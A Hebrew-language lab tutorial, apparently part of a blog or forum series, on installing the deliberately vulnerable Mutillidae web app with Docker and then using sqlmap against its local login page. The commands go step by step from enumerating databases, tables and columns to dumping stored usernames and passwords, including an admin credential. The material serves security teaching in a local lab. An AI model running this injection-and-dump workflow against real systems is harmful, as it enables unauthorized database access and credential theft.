בחרתי ב-Mutillidae משום שהיא כוללת מגוון רחב מאוד של חולשות ברמות קושי שונות, מאפשרת לשנות את רמת האבטחה בלחיצת כפתור, ומיועדת במיוחד ללימוד ותרגול בסביבה מקומית ובטוחה.

Mutillidae היא אפליקציית ווב שנבנתה בכוונה עם חולשות אבטחה רבות. המטרה שלה היא לאפשר לימוד ותרגול בסביבה בטוחה מבלי לפגוע במערכות אמיתיות.
אנחנו נחפש כאן Mutillidae ונמצא את זה

כאן יש כמה אופציות הורדה
שבגדול מתחלקות לשתיים
אחד התקנה רגילה מה שאומר שצריך להגדיר את הקונטנרים לבד
והשניה עם דוקר שהוא בונה הקונטנרים לבד ומגדיר לבד

Docker מאפשר להריץ אפליקציות בתוך סביבות מבודדות (קונטיינרים) בלי להגדיר ידנית את כל הרכיבים שהן צריכות.
אני אישית לא באתי לסבך כמה שיותר אלא לקצר (להאריך תמיד אפשר עם קצת עזרה מAI)
אז אנחנו נשתמש בדוקר אז באתר תלחצו על הדוקר ותגיעו לגיטאהב
נגלול קצת למטה (מי שמעוניין יש את הרדמי הקבוע)(ויש גם הדרכות ביוטיוב הקישורים בגיטהאב)

לפני שממשיכים ודאו שמותקנים:

Git
Docker
Docker Compose

ואז חפשו את הפקודה
עד שנגיע לפקודה הבאה

git clone https://github.com/webpwnized/mutillidae-docker.git
cd mutillidae-docker
docker compose -f .build/docker-compose.yml up --build --detach

ונריץ את הפקודה בטרמינל
הסבר קצר על הפקודות

git clone - מוריד את הפרויקט מגיטהאב.

cd - נכנס לתיקיית הפרויקט.

docker compose - בונה ומפעיל את כל הקונטיינרים הדרושים.

ונקווה לטוב (לי אישית עשה בעיות ככה שאני לא יכול להציג את מה שהיה אצלי)

אחרי הרצה של השורה הקודמת אתם נכנסים לכתובת http://127.0.0.1/
127.0.0.1 היא כתובת שמפנה למחשב שלכם עצמו (localhost).
שימו לב שבכוונה הכתובת לא מאובטחת אין את הS
האתר אמור להראות ככה

אם האתר עולה אך מציג שגיאות או שהנתונים אינם קיימים, נסו להריץ:

# Requesting Mutillidae database be built.
curl http://127.0.0.1/set-up-database.php;

האתר כולל גם סביבת LDAP לצורך תרגול. אם תרצו ליצור משתמשי דוגמה, ניתן לטעון אותם באמצעות הפקודות הבאות.

# Install LDAP Utilities including ldapadd
sudo apt-get update
sudo apt-get install -y ldap-utils

# Add users to the LDAP database
ldapadd -c -x -D "cn=admin,dc=mutillidae,dc=localhost" -w mutillidae -H ldap://localhost:389 -f .build/ldap/configuration/ldif/mutillidae.ldif

יש באתר מגוון פגיעות נסו לגלות אותם לפני ולעלות אותם לתגובות
כאן
אני ישתדל בהקדם להסביר על פגיעות שבאתר
זהו לבנתיים הצלחה

מה למדנו היום?

✓ מהו OWASP ומה מטרת הפרויקטים שהוא מספק ללימוד אבטחת מידע.

✓ מהי מעבדת Mutillidae ולמה היא משמשת לתרגול חולשות בצורה בטוחה וחוקית.

✓ כיצד מורידים ומפעילים את סביבת התרגול באמצעות Docker.

✓ מה תפקידן של הפקודות git clone, cd ו־docker compose.

✓ מהי הכתובת 127.0.0.1 ולמה היא מפנה למחשב המקומי.

✓ כיצד ליצור את בסיס הנתונים של המעבדה במקרה הצורך.

✓ כיצד לטעון משתמשי LDAP לצורך תרגול נוסף.

בפרק הבא נבצע את התרגול הראשון ונראה כיצד חולשת SQL Injection יכולה לחשוף מידע מתוך מסד נתונים.

לנציצ

עד עכשיו הקמנו את המעבדה. היום נבצע את התרגול הראשון ונראה כיצד חולשת SQL Injection עלולה לחשוף מידע רגיש ממסד נתונים.

ומה בעצם עושים היום
כלומר מה אנחנו מנסים להשיג?

למצוא נקודת חולשה.
להבין האם ניתן להגיע למסד הנתונים.
למפות את מבנה הנתונים.
לראות איזה מידע ניתן לחשוף.

המטרה אינה לזכור את הפקודות אלא להבין את תהליך החשיבה.

היום נרד לשטח ונבדוק תרחיש אמיתי של תקיפת קופסה שחורה - Black Box (בלק בוקס).

בבדיקות Black Box אנחנו מגיעים ללא גישה מוקדמת למערכת.

בבדיקות Grey Box אנחנו מתחילים עם הרשאה מסוימת ומנסים להבין מה ניתן לעשות ממנה.

אנחנו עושים תקיפה עם ידע מוגבל על המערכת. אנחנו לא בדקנו מראש דפים פגיעים יותר או פחות אלא ניגשנו ישירות לבדיקה של מנגנון ההתחברות.
במצב כזה, אנחנו מגיעים לאתר כהאקרים זרים מהאינטרנט. אין לנו שם משתמש, סיסמה או קוקיז - Cookies (קוקיז) שיאפשרו לנו להיכנס לעמודים הפנימיים. השער היחיד שפתוח בפנינו הוא עמוד הלוגין - Login (לוגין) הציבורי.

אנחנו הולכים לנצל פגיעות SQL Injection (סקוול אינג'קשן) בשדה שם המשתמש (username) של טופס ההתחברות, כדי לעקוף את מנגנון האבטחה ולהכריח את השרת להוציא לנו את כל המידע הרגיש החוצה - ישירות למסך של קאלי (Kali).

דרישת קדם: הגדרת רמת האבטחה במעבדה
לפני שמתחילים, עלינו לוודא שהמעבדה נמצאת במצב הפגיע ביותר שלה.
באתר של Mutillidae (מוטילידיי), גשו לתפריט העליון, חפשו את הכפתור Toggle Security (טוגל סקיוריטי) ולחצו עליו עד שתראו שרמת האבטחה שונה למצב 0 (Security Level: 0). מצב זה מדמה אתר אמיתי שנכתב בצורה רשלנית לחלוטין וללא שום הגנות על שדות הקלט.

שלב 1: מיפוי ובדיקת פגיעות
הפנינו את הכלי ישירות אל עמוד הלוגין. מכיוון שטופס ההתחברות נשלח בשיטת POST (פוסט) שבה הנתונים חבויים בגוף הבקשה, הגדרנו את הפרמטרים שלו בעזרת הדגל --data.

פתח את הטרמינל והרץ את הפקודה הבאה:

sqlmap -u "https://127.0.0.1/index.php?page=login.php" --data="username=test&password=test&login-php-submit-button=Login" -p username --dbms=mysql --batch --dbs

פירוט הפרמטרים בפקודה:
-u (קיצור של URL - יוראל): מגדיר את כתובת היעד הציבורית של עמוד הלוגין שאותו אנחנו רוצים לבדוק.

--data (דאטה): מכיל את השדות שנשלחים בטופס ה-POST (פוסט). הכנסנו ערכי דמי (username=test&password=test) פלוס השם של כפתור השליחה כדי שהשרת יחשוב שמשתמש אמיתי לחץ עליו.

-p username (פרמטר): פקודה מפורשת לכלי לבדוק רק את השדה של שם המשתמש, ולא לבזבז זמן על בדיקת שדה הסיסמה או לחצן השליחה.

--dbms=mysql (די-בי-אמ-אס): אומר לכלי שמסד הנתונים מאחורי הקלעים הוא MySQL (מאי-סקוול). זה חוסך בדיקות מיותרות של סוגי מסדי נתונים אחרים כמו אורקל או סקוול-סרבר.

--batch (באטץ'): פקודה שאומרת לכלי לעבוד במצב אוטומטי - לבחור תמיד באפשרות ברירת המחדל (Yes - יס) ולא לעצור באמצע הסריקה כדי לשאול אותנו שאלות.

--dbs (דאטאבייסז): הוראה מפורשת שאומרת: אם מצאת פגיעות, תשלוף מיד את רשימת בסיסי הנתונים הקיימים בשרת.

מה קרה כאן מאחורי הקלעים?
השרת ניסה לייצר עבור הכלי עוגיית אורח זמנית בשם PHPSESSID (פי-אייץ'-פי-סס-אי-די). הכלי אישר אותה אוטומטית כדי לשמור על קשר רציף מול האתר. הוא זיהה ששדה ה-username פגיע, ובסיום הסריקה הציג לנו רשימה של בסיסי נתונים. זיהינו שהבסיס המרכזי של האתר נקרא mutillidae (מוטילידיי).

אני רוצה שניה לדבר על אונלוגיה של הבדל בין עמודה לטבלה בבסיס הנתונים
אפשר לחשוב על בסיס הנתונים כמו ארון.

טבלאות הן המגירות.

עמודות הן סוגי המידע שנמצאים בכל מגירה.

שלב 2: שליפת הטבלאות מתוך בסיס הנתונים
עכשיו כשיש לנו את שם ה-Database (דאטאבייס), אנחנו רוצים לדעת אילו טבלאות קיימות בתוכו כדי למקד את התקיפה. הרצנו את הפקודה הבאה:

sqlmap -u "https://127.0.0.1/index.php?page=login.php" --data="username=test&password=test&login-php-submit-button=Login" -p username --dbms=mysql --batch -D mutillidae --tables

פירוט הפרמטרים החדשים בפקודה:
-D mutillidae (דאטאבייס): מגדיר לכלי באיזה בסיס נתונים ספציפי להתמקד (במקרה שלנו, זה שגילינו בשלב הקודם).

--tables (טייבלז): פקודה לשלוף את שמות כל הטבלאות (ה"מגירות") שנמצאות בתוך אותו בסיס נתונים.

מה קרה כאן מאחורי הקלעים?
הכלי לא סרק את האתר מחדש. הוא טען את נקודת ההזרקה ששמר בזיכרון מהסבב הקודם (טכניקה שנקראת Resumed Session - ריזומד סשן). הוא שלח שאילתה ששלפה רשימה של 13 טבלאות. מתוכן, סימנו את הטבלה המעניינת ביותר עבורנו: accounts (אקאונטס), שם שמורים המשתמשים.

שלב 3: מיפוי העמודות בטבלת המשתמשים
לפני שאנחנו מורידים מידע סתם, אנחנו צריכים להבין את המבנה הפנימי של הטבלה שבחרנו. נרצה לדעת אילו טורים (Columns - קולומז) קיימים בה:

sqlmap -u "https://127.0.0.1/index.php?page=login.php" --data="username=test&password=test&login-php-submit-button=Login" -p username --dbms=mysql --batch -D mutillidae -T accounts --columns

פירוט הפרמטרים החדשים בפקודה:
-T accounts (טייבל): מנחה את הכלי להתמקד אך ורק בטבלה הספציפית שנקראת accounts (אקאונטס).

--columns (קולומז): הוראה לשלוף את שמות הטורים (הכותרות) ואת סוגי המידע שיש בטבלה הזו.

מה קרה כאן מאחורי הקלעים?
הכלי חילץ את המבנה וגילה שיש בטבלה 10 עמודות שונות, כולל שדות כמו שם פרטי, סטטוס מנהל, ומה שחשוב לנו באמת: העמודות username (יוזרניים) ו-password (פסוורד).

שלב 4: הורדת המידע (The Dump - הדאמפ)
זהו שלב סגירת המעגל. ביקשנו מהכלי לשלוף רק את שני הטורים שמעניינים אותנו ולרוקן את התוכן שלהם למחשב שלנו:

sqlmap -u "https://127.0.0.1/index.php?page=login.php" --data="username=test&password=test&login-php-submit-button=Login" -p username --dbms=mysql --batch -D mutillidae -T accounts -C username,password --dump

פירוט הפרמטרים החדשים בפקודה:
-C username,password (קולומז): הגדרה מפורשת לשלוף נתונים אך ורק משתי העמודות האלו, כדי לא לבזבז זמן ותעבורה על מידע לא רלוונטי.

--dump (דאמפ): הפקודה שמבצעת את חילוץ הנתונים בפועל והורדתם למסך.

התוצאה הסופית:
מסד הנתונים הריץ לולאה והחזיר פלט נקי של 41 משתמשים רשומים במערכת בטקסט גלוי (Clear Text - קליר טקסט), כולל שם המשתמש והסיסמה של מנהל המערכת (admin / adminpass). בנוסף, המידע נשמר אוטומטית כקובץ בתצורת CSV (סי-אס-וי) בתוך תיקיית הפלט של הכלי בקאלי.

שורה תחתונה לחלק זה: כשעמוד ציבורי כמו לוגין אינו מאובטח (רמת אבטחה 0), הגנות פנימיות כמו עוגיות או בדיקות הרשאות הופכות ללא רלוונטיות. האקר יכול להשיג שליטה מלאה בנתונים מבלי לעבור את דף הבית. בפרק הבא נראה מה עושים כאשר האתר מוגן יותר, ואיך עובדים מול עמודים פנימיים באמצעות עוגיות מהדפדפן (Grey Box Testing - גריי בוקס טסטינג).

ועוד נקודה לציון הבדל בין קופסה אפורה לשחורה הוא
בשחורה אנחנו באים על עיוור בלי קוקיז ותוקפים בדף פגיע
באפורה אנחנו באים עם קוקיז חיבור בהרשאה מסוימת לאתר וממנו מנסים לעלות למעלה בהרשאה
וחברה אם משהו לא ברור הוא לא מובן וכמו כן כל הערה והארה יתקבלו בברכה
מצפה לתגובות כאן

מה למדנו היום?

✓ איך נראה תהליך עבודה מסודר.
✓ איך עוברים מגילוי חולשה להבנת מבנה המידע.
✓ למה חשוב להבין את מבנה הנתונים לפני שמנסים לחפש מידע.

בפרק הבא נראה מה משתנה כאשר אנחנו מתחילים עם הרשאות קיימות למערכת.

לנציצ

העריכה בוצעה לכלל הדפים